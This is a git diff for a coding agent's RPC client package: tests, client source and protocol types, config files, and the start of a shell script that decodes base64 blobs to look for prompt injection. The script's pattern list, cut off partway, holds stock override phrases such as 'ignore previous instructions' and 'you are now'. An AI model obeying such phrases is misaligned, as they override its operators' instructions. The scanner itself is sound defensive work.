client.sendUIResponse("ui_3", { cancelled: true }); + + const parsed = JSON.parse(chunks[0].trim()); + assert.equal(parsed.cancelled, true); + }); +}); + +// ============================================================================ +// init/shutdown/subscribe Serialization Tests +// ============================================================================ + +describe("v2 command serialization", () => { + // Helper: capture what the client sends to stdin + function createMockClient(): { client: RpcClient; sent: any[]; respondNext: (data?: any) => void } { + const client = new RpcClient(); + const sent: any[] = []; + let respondFn: ((data: any) => void) | null = null; + + const clientAny = client as any; + clientAny.process = { + stdin: { + write: (data: string) => { + const parsed = JSON.parse(data.trim()); + sent.push(parsed); + // Auto-respond with success after a tick + if (respondFn) { + setTimeout(() => respondFn!(parsed), 5); + } + return true; + }, + }, + stderr: new PassThrough(), + exitCode: null, + kill: () => {}, + on: () => {}, + removeListener: () => {}, + }; + + const respondNext = (overrides: any = {}) => { + respondFn = (parsed) => { + const response = { + type: "response", + id: parsed.id, + command: parsed.type, + success: true, + data: {}, + ...overrides, + }; + clientAny.handleLine(JSON.stringify(response)); + }; + }; + + return { client, sent, respondNext }; + } + + it("init sends correct v2 init command", async () => { + const { client, sent, respondNext } = createMockClient(); + respondNext({ data: { protocolVersion: 2, sessionId: "s1", capabilities: { events: [], commands: [] } } }); + + const result = await client.init({ clientId: "test-app" }); + + assert.equal(sent.length, 1); + assert.equal(sent[0].type, "init"); + assert.equal(sent[0].protocolVersion, 2); + assert.equal(sent[0].clientId, "test-app"); + assert.equal(result.protocolVersion, 2); + assert.equal(result.sessionId, "s1"); + }); + + it("shutdown sends shutdown command", 
async () => { + const { client, sent, respondNext } = createMockClient(); + + // Override the process exit wait + const clientAny = client as any; + const originalProcess = clientAny.process; + const exitHandlers: Array<(code: number) => void> = []; + clientAny.process = { + ...originalProcess, + on: (event: string, handler: (code: number) => void) => { + if (event === "exit") exitHandlers.push(handler); + }, + }; + + respondNext(); + + // Call shutdown and simulate process exit + const shutdownPromise = client.shutdown(); + await new Promise((r) => setTimeout(r, 20)); + for (const h of exitHandlers) h(0); + + await shutdownPromise; + + assert.equal(sent.length, 1); + assert.equal(sent[0].type, "shutdown"); + }); + + it("subscribe sends subscribe command with event list", async () => { + const { client, sent, respondNext } = createMockClient(); + respondNext(); + + await client.subscribe(["execution_complete", "cost_update"]); + + assert.equal(sent.length, 1); + assert.equal(sent[0].type, "subscribe"); + assert.deepEqual(sent[0].events, ["execution_complete", "cost_update"]); + }); + + it("subscribe with wildcard", async () => { + const { client, sent, respondNext } = createMockClient(); + respondNext(); + + await client.subscribe(["*"]); + + assert.equal(sent[0].events.length, 1); + assert.equal(sent[0].events[0], "*"); + }); +}); diff --git a/packages/rpc-client/src/rpc-client.ts b/packages/rpc-client/src/rpc-client.ts new file mode 100644 index 000000000..4d5edc53c --- /dev/null +++ b/packages/rpc-client/src/rpc-client.ts @@ -0,0 +1,666 @@ +/** + * RPC Client for programmatic access to the coding agent. + * + * Spawns the agent in RPC mode and provides a typed API for all operations. + * This is a standalone SDK client — all types are inlined with zero internal + * package dependencies. 
+ */ + +import { type ChildProcess, spawn } from "node:child_process"; +import { attachJsonlLineReader, serializeJsonLine } from "./jsonl.js"; +import type { + BashResult, + CompactionResult, + ImageContent, + ModelInfo, + RpcCommand, + RpcInitResult, + RpcResponse, + RpcSessionState, + RpcSlashCommand, + ThinkingLevel, + SessionStats, +} from "./rpc-types.js"; + +// ============================================================================ +// Types +// ============================================================================ + +/** Distributive Omit that works with union types */ +type DistributiveOmit = T extends unknown ? Omit : never; + +/** RpcCommand without the id field (for internal send) */ +type RpcCommandBody = DistributiveOmit; + +/** Agent event — a loosely-typed record from the server. The `type` field is always present. */ +export interface SdkAgentEvent { + type: string; + [key: string]: unknown; +} + +export interface RpcClientOptions { + /** Path to the CLI entry point (default: searches for dist/cli.js) */ + cliPath?: string; + /** Working directory for the agent */ + cwd?: string; + /** Environment variables */ + env?: Record; + /** Provider to use */ + provider?: string; + /** Model ID to use */ + model?: string; + /** Additional CLI arguments */ + args?: string[]; +} + +export type RpcEventListener = (event: SdkAgentEvent) => void; + +// ============================================================================ +// RPC Client +// ============================================================================ + +export class RpcClient { + private process: ChildProcess | null = null; + private stopReadingStdout: (() => void) | null = null; + private _stderrHandler?: (data: Buffer) => void; + private eventListeners: RpcEventListener[] = []; + private pendingRequests: Map void; reject: (error: Error) => void }> = + new Map(); + private requestId = 0; + private stderr = ""; + private _stopped = false; + + constructor(private options: 
RpcClientOptions = {}) {} + + /** + * Start the RPC agent process. + */ + async start(): Promise { + if (this.process) { + throw new Error("Client already started"); + } + + this._stopped = false; + + const cliPath = this.options.cliPath ?? "dist/cli.js"; + const args = ["--mode", "rpc"]; + + if (this.options.provider) { + args.push("--provider", this.options.provider); + } + if (this.options.model) { + args.push("--model", this.options.model); + } + if (this.options.args) { + args.push(...this.options.args); + } + + this.process = spawn("node", [cliPath, ...args], { + cwd: this.options.cwd, + env: { ...process.env, ...this.options.env }, + stdio: ["pipe", "pipe", "pipe"], + }); + + // Collect stderr for debugging + this._stderrHandler = (data: Buffer) => { + this.stderr += data.toString(); + }; + this.process.stderr?.on("data", this._stderrHandler); + + // Set up strict JSONL reader for stdout. + this.stopReadingStdout = attachJsonlLineReader(this.process.stdout!, (line) => { + this.handleLine(line); + }); + + // Detect unexpected subprocess exit and reject all pending requests + this.process.on("exit", (code, signal) => { + if (this.pendingRequests.size > 0) { + const reason = signal ? `signal ${signal}` : `code ${code}`; + const error = new Error(`Agent process exited unexpectedly (${reason}). Stderr: ${this.stderr}`); + for (const [id, pending] of this.pendingRequests) { + this.pendingRequests.delete(id); + pending.reject(error); + } + } + }); + + // Wait a moment for process to initialize + await new Promise((resolve) => setTimeout(resolve, 100)); + + if (this.process.exitCode !== null) { + throw new Error(`Agent process exited immediately with code ${this.process.exitCode}. Stderr: ${this.stderr}`); + } + } + + /** + * Stop the RPC agent process. 
+ */ + async stop(): Promise { + if (!this.process) return; + + this._stopped = true; + + this.stopReadingStdout?.(); + this.stopReadingStdout = null; + if (this._stderrHandler) { + this.process.stderr?.removeListener("data", this._stderrHandler); + this._stderrHandler = undefined; + } + this.process.kill("SIGTERM"); + + // Wait for process to exit + await new Promise((resolve) => { + const timeout = setTimeout(() => { + this.process?.kill("SIGKILL"); + resolve(); + }, 1000); + + this.process?.on("exit", () => { + clearTimeout(timeout); + resolve(); + }); + }); + + this.process = null; + this.pendingRequests.clear(); + } + + /** + * Subscribe to agent events via callback. + */ + onEvent(listener: RpcEventListener): () => void { + this.eventListeners.push(listener); + return () => { + const index = this.eventListeners.indexOf(listener); + if (index !== -1) { + this.eventListeners.splice(index, 1); + } + }; + } + + /** + * Async generator that yields agent events as they arrive. + * + * Usage: + * ```ts + * for await (const event of client.events()) { + * console.log(event.type, event); + * } + * ``` + * + * The generator terminates when: + * - `stop()` is called + * - The agent process exits + * - The consumer breaks out of the loop + */ + async *events(): AsyncGenerator { + if (!this.process) { + throw new Error("Client not started — call start() before events()"); + } + + if (this._stopped) { + return; + } + + const buffer: SdkAgentEvent[] = []; + let resolve: ((value: void) => void) | null = null; + let done = false; + + // When a new event arrives, either push to buffer or wake up the awaiting generator + const listener = (event: SdkAgentEvent) => { + buffer.push(event); + if (resolve) { + const r = resolve; + resolve = null; + r(); + } + }; + + // When the process exits, signal the generator to stop + const onExit = () => { + done = true; + if (resolve) { + const r = resolve; + resolve = null; + r(); + } + }; + + const unsubscribe = this.onEvent(listener); + 
this.process.on("exit", onExit); + + try { + while (!done && !this._stopped) { + // Drain buffer first + while (buffer.length > 0) { + yield buffer.shift()!; + } + + // If done after draining, break + if (done || this._stopped) { + break; + } + + // Wait for next event or process exit + await new Promise((r) => { + resolve = r; + }); + } + + // Drain any remaining events that arrived with the exit signal + while (buffer.length > 0) { + yield buffer.shift()!; + } + } finally { + unsubscribe(); + this.process?.removeListener("exit", onExit); + } + } + + /** + * Get collected stderr output (useful for debugging). + */ + getStderr(): string { + return this.stderr; + } + + // ========================================================================= + // Command Methods + // ========================================================================= + + /** + * Send a prompt to the agent. + * Returns immediately after sending; use onEvent() or events() to receive streaming events. + * Use waitForIdle() to wait for completion. + */ + async prompt(message: string, images?: ImageContent[]): Promise { + await this.send({ type: "prompt", message, images }); + } + + /** + * Queue a steering message to interrupt the agent mid-run. + */ + async steer(message: string, images?: ImageContent[]): Promise { + await this.send({ type: "steer", message, images }); + } + + /** + * Queue a follow-up message to be processed after the agent finishes. + */ + async followUp(message: string, images?: ImageContent[]): Promise { + await this.send({ type: "follow_up", message, images }); + } + + /** + * Abort current operation. + */ + async abort(): Promise { + await this.send({ type: "abort" }); + } + + /** + * Start a new session, optionally with parent tracking. 
+ * @param parentSession - Optional parent session path for lineage tracking + * @returns Object with `cancelled: true` if an extension cancelled the new session + */ + async newSession(parentSession?: string): Promise<{ cancelled: boolean }> { + const response = await this.send({ type: "new_session", parentSession }); + return this.getData(response); + } + + /** + * Get current session state. + */ + async getState(): Promise { + const response = await this.send({ type: "get_state" }); + return this.getData(response); + } + + /** + * Set model by provider and ID. + */ + async setModel(provider: string, modelId: string): Promise<{ provider: string; id: string }> { + const response = await this.send({ type: "set_model", provider, modelId }); + return this.getData(response); + } + + /** + * Cycle to next model. + */ + async cycleModel(): Promise<{ + model: { provider: string; id: string }; + thinkingLevel: ThinkingLevel; + isScoped: boolean; + } | null> { + const response = await this.send({ type: "cycle_model" }); + return this.getData(response); + } + + /** + * Get list of available models. + */ + async getAvailableModels(): Promise { + const response = await this.send({ type: "get_available_models" }); + return this.getData<{ models: ModelInfo[] }>(response).models; + } + + /** + * Set thinking level. + */ + async setThinkingLevel(level: ThinkingLevel): Promise { + await this.send({ type: "set_thinking_level", level }); + } + + /** + * Cycle thinking level. + */ + async cycleThinkingLevel(): Promise<{ level: ThinkingLevel } | null> { + const response = await this.send({ type: "cycle_thinking_level" }); + return this.getData(response); + } + + /** + * Set steering mode. + */ + async setSteeringMode(mode: "all" | "one-at-a-time"): Promise { + await this.send({ type: "set_steering_mode", mode }); + } + + /** + * Set follow-up mode. 
+ */ + async setFollowUpMode(mode: "all" | "one-at-a-time"): Promise { + await this.send({ type: "set_follow_up_mode", mode }); + } + + /** + * Compact session context. + */ + async compact(customInstructions?: string): Promise { + const response = await this.send({ type: "compact", customInstructions }); + return this.getData(response); + } + + /** + * Set auto-compaction enabled/disabled. + */ + async setAutoCompaction(enabled: boolean): Promise { + await this.send({ type: "set_auto_compaction", enabled }); + } + + /** + * Set auto-retry enabled/disabled. + */ + async setAutoRetry(enabled: boolean): Promise { + await this.send({ type: "set_auto_retry", enabled }); + } + + /** + * Abort in-progress retry. + */ + async abortRetry(): Promise { + await this.send({ type: "abort_retry" }); + } + + /** + * Execute a bash command. + */ + async bash(command: string): Promise { + const response = await this.send({ type: "bash", command }); + return this.getData(response); + } + + /** + * Abort running bash command. + */ + async abortBash(): Promise { + await this.send({ type: "abort_bash" }); + } + + /** + * Get session statistics. + */ + async getSessionStats(): Promise { + const response = await this.send({ type: "get_session_stats" }); + return this.getData(response); + } + + /** + * Export session to HTML. + */ + async exportHtml(outputPath?: string): Promise<{ path: string }> { + const response = await this.send({ type: "export_html", outputPath }); + return this.getData(response); + } + + /** + * Switch to a different session file. + * @returns Object with `cancelled: true` if an extension cancelled the switch + */ + async switchSession(sessionPath: string): Promise<{ cancelled: boolean }> { + const response = await this.send({ type: "switch_session", sessionPath }); + return this.getData(response); + } + + /** + * Fork from a specific message. 
+ * @returns Object with `text` (the message text) and `cancelled` (if extension cancelled) + */ + async fork(entryId: string): Promise<{ text: string; cancelled: boolean }> { + const response = await this.send({ type: "fork", entryId }); + return this.getData(response); + } + + /** + * Get messages available for forking. + */ + async getForkMessages(): Promise> { + const response = await this.send({ type: "get_fork_messages" }); + return this.getData<{ messages: Array<{ entryId: string; text: string }> }>(response).messages; + } + + /** + * Get text of last assistant message. + */ + async getLastAssistantText(): Promise { + const response = await this.send({ type: "get_last_assistant_text" }); + return this.getData<{ text: string | null }>(response).text; + } + + /** + * Set the session display name. + */ + async setSessionName(name: string): Promise { + await this.send({ type: "set_session_name", name }); + } + + /** + * Get all messages in the session. + * Messages are returned as opaque objects — the internal structure may vary. + */ + async getMessages(): Promise { + const response = await this.send({ type: "get_messages" }); + return this.getData<{ messages: unknown[] }>(response).messages; + } + + /** + * Get available commands (extension commands, prompt templates, skills). + */ + async getCommands(): Promise { + const response = await this.send({ type: "get_commands" }); + return this.getData<{ commands: RpcSlashCommand[] }>(response).commands; + } + + /** + * Send a UI response to a pending extension_ui_request. + * Fire-and-forget — no request/response correlation. + */ + sendUIResponse(id: string, response: { value?: string; values?: string[]; confirmed?: boolean; cancelled?: boolean }): void { + if (!this.process?.stdin) { + throw new Error("Client not started"); + } + this.process.stdin.write(serializeJsonLine({ + type: "extension_ui_response", + id, + ...response, + })); + } + + /** + * Initialize a v2 protocol session. 
Must be sent as the first command. + * Returns the negotiated protocol version, session ID, and server capabilities. + */ + async init(options?: { clientId?: string }): Promise { + const response = await this.send({ type: "init", protocolVersion: 2, clientId: options?.clientId }); + return this.getData(response); + } + + /** + * Request a graceful shutdown of the agent process. + * Waits for the response before the process exits. + */ + async shutdown(): Promise { + await this.send({ type: "shutdown" }); + // Wait for process to exit after shutdown acknowledgment + if (this.process) { + await new Promise((resolve) => { + const timeout = setTimeout(() => { + this.process?.kill("SIGKILL"); + resolve(); + }, 5000); + this.process?.on("exit", () => { + clearTimeout(timeout); + resolve(); + }); + }); + } + } + + /** + * Subscribe to specific event types (v2 only). + * Pass ["*"] to receive all events, or a list of event type strings to filter. + */ + async subscribe(events: string[]): Promise { + await this.send({ type: "subscribe", events }); + } + + // ========================================================================= + // Helpers + // ========================================================================= + + /** + * Wait for agent to become idle (no streaming). + * Resolves when agent_end event is received. + */ + waitForIdle(timeout = 60000): Promise { + return new Promise((resolve, reject) => { + const timer = setTimeout(() => { + unsubscribe(); + reject(new Error(`Timeout waiting for agent to become idle. Stderr: ${this.stderr}`)); + }, timeout); + + const unsubscribe = this.onEvent((event) => { + if (event.type === "agent_end") { + clearTimeout(timer); + unsubscribe(); + resolve(); + } + }); + }); + } + + /** + * Collect events until agent becomes idle. 
+ */ + collectEvents(timeout = 60000): Promise { + return new Promise((resolve, reject) => { + const events: SdkAgentEvent[] = []; + const timer = setTimeout(() => { + unsubscribe(); + reject(new Error(`Timeout collecting events. Stderr: ${this.stderr}`)); + }, timeout); + + const unsubscribe = this.onEvent((event) => { + events.push(event); + if (event.type === "agent_end") { + clearTimeout(timer); + unsubscribe(); + resolve(events); + } + }); + }); + } + + /** + * Send prompt and wait for completion, returning all events. + */ + async promptAndWait(message: string, images?: ImageContent[], timeout = 60000): Promise { + const eventsPromise = this.collectEvents(timeout); + await this.prompt(message, images); + return eventsPromise; + } + + // ========================================================================= + // Internal + // ========================================================================= + + private handleLine(line: string): void { + try { + const data = JSON.parse(line); + + // Check if it's a response to a pending request + if (data.type === "response" && data.id && this.pendingRequests.has(data.id)) { + const pending = this.pendingRequests.get(data.id)!; + this.pendingRequests.delete(data.id); + pending.resolve(data as RpcResponse); + return; + } + + // Otherwise it's an event — dispatch to listeners + for (const listener of this.eventListeners) { + listener(data as SdkAgentEvent); + } + } catch { + // Ignore non-JSON lines + } + } + + private async send(command: RpcCommandBody): Promise { + if (!this.process?.stdin) { + throw new Error("Client not started"); + } + + const id = `req_${++this.requestId}`; + const fullCommand = { ...command, id } as RpcCommand; + + return new Promise((resolve, reject) => { + const timeout = setTimeout(() => { + this.pendingRequests.delete(id); + reject(new Error(`Timeout waiting for response to ${command.type}. 
Stderr: ${this.stderr}`)); + }, 30000); + + this.pendingRequests.set(id, { + resolve: (response) => { + clearTimeout(timeout); + resolve(response); + }, + reject: (error) => { + clearTimeout(timeout); + reject(error); + }, + }); + + this.process!.stdin!.write(serializeJsonLine(fullCommand)); + }); + } + + private getData(response: RpcResponse): T { + if (!response.success) { + const errorResponse = response as Extract; + throw new Error(errorResponse.error); + } + // Type assertion: we trust response.data matches T based on the command sent. + const successResponse = response as Extract; + return successResponse.data as T; + } +} diff --git a/packages/rpc-client/src/rpc-types.ts b/packages/rpc-client/src/rpc-types.ts new file mode 100644 index 000000000..be8bca73b --- /dev/null +++ b/packages/rpc-client/src/rpc-types.ts @@ -0,0 +1,399 @@ +/** + * RPC protocol types for headless operation. + * + * Commands are sent as JSON lines on stdin. + * Responses and events are emitted as JSON lines on stdout. + * + * This file is self-contained — all types that were previously imported from + * internal packages are inlined so that this package has zero internal + * dependencies. 
+ */ + +// ============================================================================ +// Inlined types (originally from internal packages) +// ============================================================================ + +/** Thinking budget level (inlined from agent-core) */ +export type ThinkingLevel = "off" | "minimal" | "low" | "medium" | "high" | "xhigh"; + +/** Image attachment (inlined from pi-ai) */ +export interface ImageContent { + type: "image"; + data: string; // base64 encoded image data + mimeType: string; // e.g., "image/jpeg", "image/png" +} + +/** Model descriptor — opaque for SDK consumers */ +export interface ModelInfo { + provider: string; + id: string; + contextWindow?: number; + reasoning?: boolean; + [key: string]: unknown; +} + +/** Session statistics (from agent-session.ts) */ +export interface SessionStats { + sessionFile: string | undefined; + sessionId: string; + userMessages: number; + assistantMessages: number; + toolCalls: number; + toolResults: number; + totalMessages: number; + tokens: { + input: number; + output: number; + cacheRead: number; + cacheWrite: number; + total: number; + }; + cost: number; +} + +/** Bash command result (from bash-executor.ts) */ +export interface BashResult { + /** Combined stdout + stderr output (sanitized, possibly truncated) */ + output: string; + /** Process exit code (undefined if killed/cancelled) */ + exitCode: number | undefined; + /** Whether the command was cancelled via signal */ + cancelled: boolean; + /** Whether the output was truncated */ + truncated: boolean; + /** Path to temp file containing full output (if output exceeded truncation threshold) */ + fullOutputPath?: string; +} + +/** Compaction result (from compaction.ts) */ +export interface CompactionResult { + summary: string; + firstKeptEntryId: string; + tokensBefore: number; + /** Extension-specific data (e.g., ArtifactIndex, version markers for structured compaction) */ + details?: T; +} + +// 
============================================================================
// RPC Protocol Versioning
// ============================================================================

/** Supported protocol versions. v1 is the implicit default; v2 requires an init handshake. */
export type RpcProtocolVersion = 1 | 2;

// ============================================================================
// RPC Commands (stdin)
// ============================================================================

// Every command may carry an optional `id`; when present, the matching
// response echoes it back so the client can correlate request and response.
export type RpcCommand =
  // Prompting
  | { id?: string; type: "prompt"; message: string; images?: ImageContent[]; streamingBehavior?: "steer" | "followUp" }
  | { id?: string; type: "steer"; message: string; images?: ImageContent[] }
  | { id?: string; type: "follow_up"; message: string; images?: ImageContent[] }
  | { id?: string; type: "abort" }
  | { id?: string; type: "new_session"; parentSession?: string }

  // State
  | { id?: string; type: "get_state" }

  // Model
  | { id?: string; type: "set_model"; provider: string; modelId: string }
  | { id?: string; type: "cycle_model" }
  | { id?: string; type: "get_available_models" }

  // Thinking
  | { id?: string; type: "set_thinking_level"; level: ThinkingLevel }
  | { id?: string; type: "cycle_thinking_level" }

  // Queue modes
  | { id?: string; type: "set_steering_mode"; mode: "all" | "one-at-a-time" }
  | { id?: string; type: "set_follow_up_mode"; mode: "all" | "one-at-a-time" }

  // Compaction
  | { id?: string; type: "compact"; customInstructions?: string }
  | { id?: string; type: "set_auto_compaction"; enabled: boolean }

  // Retry
  | { id?: string; type: "set_auto_retry"; enabled: boolean }
  | { id?: string; type: "abort_retry" }

  // Bash
  | { id?: string; type: "bash"; command: string }
  | { id?: string; type: "abort_bash" }

  // Session
  | { id?: string; type: "get_session_stats" }
  | { id?: string; type: "export_html"; outputPath?: string }
  | { id?: string; type: "switch_session"; sessionPath: string }
  | { id?: string; type: "fork"; entryId: string }
  | { id?: string; type: "get_fork_messages" }
  | { id?: string; type: "get_last_assistant_text" }
  | { id?: string; type: "set_session_name"; name: string }

  // Messages
  | { id?: string; type: "get_messages" }

  // Commands (available for invocation via prompt)
  | { id?: string; type: "get_commands" }

  // Bridge-hosted native terminal
  | { id?: string; type: "terminal_input"; data: string }
  | { id?: string; type: "terminal_resize"; cols: number; rows: number }
  | { id?: string; type: "terminal_redraw" }

  // v2 Protocol
  | { id?: string; type: "init"; protocolVersion: 2; clientId?: string }
  | { id?: string; type: "shutdown"; graceful?: boolean }
  | { id?: string; type: "subscribe"; events: string[] };

// ============================================================================
// RPC Slash Command (for get_commands response)
// ============================================================================

/** A command available for invocation via prompt */
export interface RpcSlashCommand {
  /** Command name (without leading slash) */
  name: string;
  /** Human-readable description */
  description?: string;
  /** What kind of command this is */
  source: "extension" | "prompt" | "skill";
  /** Where the command was loaded from (undefined for extensions) */
  location?: "user" | "project" | "path";
  /** File path to the command source */
  path?: string;
}

// ============================================================================
// RPC State
// ============================================================================

/** Snapshot of the agent session, returned by the get_state command. */
export interface RpcSessionState {
  model?: ModelInfo;
  thinkingLevel: ThinkingLevel;
  isStreaming: boolean;
  isCompacting: boolean;
  steeringMode: "all" | "one-at-a-time";
  followUpMode: "all" | "one-at-a-time";
  sessionFile?: string;
  sessionId: string;
  sessionName?: string;
autoCompactionEnabled: boolean; + autoRetryEnabled: boolean; + retryInProgress: boolean; + retryAttempt: number; + messageCount: number; + pendingMessageCount: number; + /** Whether extension loading has completed. Commands from `get_commands` may be incomplete until true. */ + extensionsReady: boolean; +} + +// ============================================================================ +// RPC Responses (stdout) +// ============================================================================ + +// Success responses with data +export type RpcResponse = + // Prompting (async - events follow) + | { id?: string; type: "response"; command: "prompt"; success: true; runId?: string } + | { id?: string; type: "response"; command: "steer"; success: true; runId?: string } + | { id?: string; type: "response"; command: "follow_up"; success: true; runId?: string } + | { id?: string; type: "response"; command: "abort"; success: true } + | { id?: string; type: "response"; command: "new_session"; success: true; data: { cancelled: boolean } } + + // State + | { id?: string; type: "response"; command: "get_state"; success: true; data: RpcSessionState } + + // Model + | { + id?: string; + type: "response"; + command: "set_model"; + success: true; + data: ModelInfo; + } + | { + id?: string; + type: "response"; + command: "cycle_model"; + success: true; + data: { model: ModelInfo; thinkingLevel: ThinkingLevel; isScoped: boolean } | null; + } + | { + id?: string; + type: "response"; + command: "get_available_models"; + success: true; + data: { models: ModelInfo[] }; + } + + // Thinking + | { id?: string; type: "response"; command: "set_thinking_level"; success: true } + | { + id?: string; + type: "response"; + command: "cycle_thinking_level"; + success: true; + data: { level: ThinkingLevel } | null; + } + + // Queue modes + | { id?: string; type: "response"; command: "set_steering_mode"; success: true } + | { id?: string; type: "response"; command: "set_follow_up_mode"; success: true } 
+ + // Compaction + | { id?: string; type: "response"; command: "compact"; success: true; data: CompactionResult } + | { id?: string; type: "response"; command: "set_auto_compaction"; success: true } + + // Retry + | { id?: string; type: "response"; command: "set_auto_retry"; success: true } + | { id?: string; type: "response"; command: "abort_retry"; success: true } + + // Bash + | { id?: string; type: "response"; command: "bash"; success: true; data: BashResult } + | { id?: string; type: "response"; command: "abort_bash"; success: true } + + // Session + | { id?: string; type: "response"; command: "get_session_stats"; success: true; data: SessionStats } + | { id?: string; type: "response"; command: "export_html"; success: true; data: { path: string } } + | { id?: string; type: "response"; command: "switch_session"; success: true; data: { cancelled: boolean } } + | { id?: string; type: "response"; command: "fork"; success: true; data: { text: string; cancelled: boolean } } + | { + id?: string; + type: "response"; + command: "get_fork_messages"; + success: true; + data: { messages: Array<{ entryId: string; text: string }> }; + } + | { + id?: string; + type: "response"; + command: "get_last_assistant_text"; + success: true; + data: { text: string | null }; + } + | { id?: string; type: "response"; command: "set_session_name"; success: true } + + // Messages — AgentMessage is opaque for SDK consumers + | { id?: string; type: "response"; command: "get_messages"; success: true; data: { messages: unknown[] } } + + // Commands + | { + id?: string; + type: "response"; + command: "get_commands"; + success: true; + data: { commands: RpcSlashCommand[] }; + } + + // Bridge-hosted native terminal + | { id?: string; type: "response"; command: "terminal_input"; success: true } + | { id?: string; type: "response"; command: "terminal_resize"; success: true } + | { id?: string; type: "response"; command: "terminal_redraw"; success: true } + + // v2 Protocol + | { id?: string; type: 
"response"; command: "init"; success: true; data: RpcInitResult } + | { id?: string; type: "response"; command: "shutdown"; success: true } + | { id?: string; type: "response"; command: "subscribe"; success: true } + + // Error response (any command can fail) + | { id?: string; type: "response"; command: string; success: false; error: string }; + +// ============================================================================ +// v2 Protocol Types +// ============================================================================ + +/** Result of the init handshake (v2 only) */ +export interface RpcInitResult { + protocolVersion: 2; + sessionId: string; + capabilities: { + events: string[]; + commands: string[]; + }; +} + +/** v2 execution_complete event — emitted when a prompt/steer/follow_up finishes */ +export interface RpcExecutionCompleteEvent { + type: "execution_complete"; + runId: string; + status: "completed" | "error" | "cancelled"; + reason?: string; + stats: SessionStats; +} + +/** v2 cost_update event — emitted per-turn with running cost data */ +export interface RpcCostUpdateEvent { + type: "cost_update"; + runId: string; + turnCost: number; + cumulativeCost: number; + tokens: { + input: number; + output: number; + cacheRead: number; + cacheWrite: number; + }; +} + +/** Discriminated union of all v2-only event types */ +export type RpcV2Event = RpcExecutionCompleteEvent | RpcCostUpdateEvent; + +// ============================================================================ +// Extension UI Events (stdout) +// ============================================================================ + +/** Emitted when an extension needs user input */ +export type RpcExtensionUIRequest = + | { type: "extension_ui_request"; id: string; method: "select"; title: string; options: string[]; timeout?: number; allowMultiple?: boolean } + | { type: "extension_ui_request"; id: string; method: "confirm"; title: string; message: string; timeout?: number } + | { + type: 
"extension_ui_request"; + id: string; + method: "input"; + title: string; + placeholder?: string; + timeout?: number; + } + | { type: "extension_ui_request"; id: string; method: "editor"; title: string; prefill?: string } + | { + type: "extension_ui_request"; + id: string; + method: "notify"; + message: string; + notifyType?: "info" | "warning" | "error"; + } + | { + type: "extension_ui_request"; + id: string; + method: "setStatus"; + statusKey: string; + statusText: string | undefined; + } + | { + type: "extension_ui_request"; + id: string; + method: "setWidget"; + widgetKey: string; + widgetLines: string[] | undefined; + widgetPlacement?: "aboveEditor" | "belowEditor"; + } + | { type: "extension_ui_request"; id: string; method: "setTitle"; title: string } + | { type: "extension_ui_request"; id: string; method: "set_editor_text"; text: string }; + +// ============================================================================ +// Extension UI Commands (stdin) +// ============================================================================ + +/** Response to an extension UI request */ +export type RpcExtensionUIResponse = + | { type: "extension_ui_response"; id: string; value: string } + | { type: "extension_ui_response"; id: string; values: string[] } + | { type: "extension_ui_response"; id: string; confirmed: boolean } + | { type: "extension_ui_response"; id: string; cancelled: true }; + +// ============================================================================ +// Helper type for extracting command types +// ============================================================================ + +export type RpcCommandType = RpcCommand["type"]; diff --git a/packages/rpc-client/tsconfig.examples.json b/packages/rpc-client/tsconfig.examples.json new file mode 100644 index 000000000..8453c546d --- /dev/null +++ b/packages/rpc-client/tsconfig.examples.json @@ -0,0 +1,17 @@ +{ + "compilerOptions": { + "target": "ES2024", + "module": "Node16", + "lib": ["ES2024"], + 
"strict": true, + "esModuleInterop": true, + "skipLibCheck": true, + "moduleResolution": "Node16", + "noEmit": true, + "types": ["node"], + "paths": { + "@gsd-build/rpc-client": ["./src/index.ts"] + } + }, + "include": ["examples/**/*.ts"] +} diff --git a/packages/rpc-client/tsconfig.json b/packages/rpc-client/tsconfig.json new file mode 100644 index 000000000..779b48aca --- /dev/null +++ b/packages/rpc-client/tsconfig.json @@ -0,0 +1,24 @@ +{ + "compilerOptions": { + "target": "ES2024", + "module": "Node16", + "lib": ["ES2024"], + "strict": true, + "esModuleInterop": true, + "skipLibCheck": true, + "forceConsistentCasingInFileNames": true, + "declaration": true, + "declarationMap": true, + "sourceMap": true, + "inlineSources": true, + "inlineSourceMap": false, + "moduleResolution": "Node16", + "resolveJsonModule": true, + "allowImportingTsExtensions": false, + "types": ["node"], + "outDir": "./dist", + "rootDir": "./src" + }, + "include": ["src/**/*.ts"], + "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts"] +} diff --git a/pkg/package.json b/pkg/package.json index 2cf3754fc..248f9d751 100644 --- a/pkg/package.json +++ b/pkg/package.json @@ -1,6 +1,6 @@ { "name": "@glittercowboy/gsd", - "version": "2.41.0", + "version": "2.67.0", "piConfig": { "name": "gsd", "configDir": ".gsd" diff --git a/repowise.db b/repowise.db new file mode 100644 index 000000000..df702d28f Binary files /dev/null and b/repowise.db differ diff --git a/scripts/base64-scan.sh b/scripts/base64-scan.sh new file mode 100755 index 000000000..e79428430 --- /dev/null +++ b/scripts/base64-scan.sh @@ -0,0 +1,242 @@ +#!/usr/bin/env bash +# Base64 obfuscation scanner — extracts base64 blobs from changed files, +# decodes them, and checks decoded content for prompt injection patterns. +# +# Catches obfuscated directives that would bypass docs-prompt-injection-scan.sh, +# which only scans raw text in markdown files. 
+# +# Usage: +# scripts/base64-scan.sh # scan staged files (pre-commit mode) +# scripts/base64-scan.sh --diff origin/main # scan diff vs branch (CI mode) +# scripts/base64-scan.sh --file path # scan a specific file +# +# Works on macOS (BSD grep) and Linux (GNU grep) — uses only ERE patterns. + +set -euo pipefail + +RED='\033[0;31m' +YELLOW='\033[1;33m' +CYAN='\033[0;36m' +NC='\033[0m' + +IGNOREFILE=".base64scanignore" +EXIT_CODE=0 +FINDINGS=0 + +# Blobs shorter than this have too many false positives. +# 40 base64 chars decodes to ~30 bytes — minimum length for a meaningful directive. +MIN_BLOB_LEN=40 + +# ── Prompt injection patterns to match against decoded content ──────── +# Format: "Label:::flags:::regex" +# Mirrors the patterns in docs-prompt-injection-scan.sh but applied to +# base64-decoded content across all file types. +DECODED_PATTERNS=( + # System prompt markers + "System prompt marker:::i:::" + "System prompt marker:::i:::<\|im_start\|>system" + "System prompt marker:::i:::\[SYSTEM\][[:space:]]*:" + + # Role injection / override + "Role injection:::i:::you are now [a-z]" + "Instruction override:::i:::ignore (all )?previous instructions" + "Instruction override:::i:::ignore (all )?prior instructions" + "Instruction override:::i:::disregard (all )?(above|previous|prior)" + "Instruction override:::i:::forget (all )?(above|previous|prior) (instructions|context|rules)" + "Instruction override:::i:::new instructions:" + "Instruction override:::i:::override (all )?instructions" + 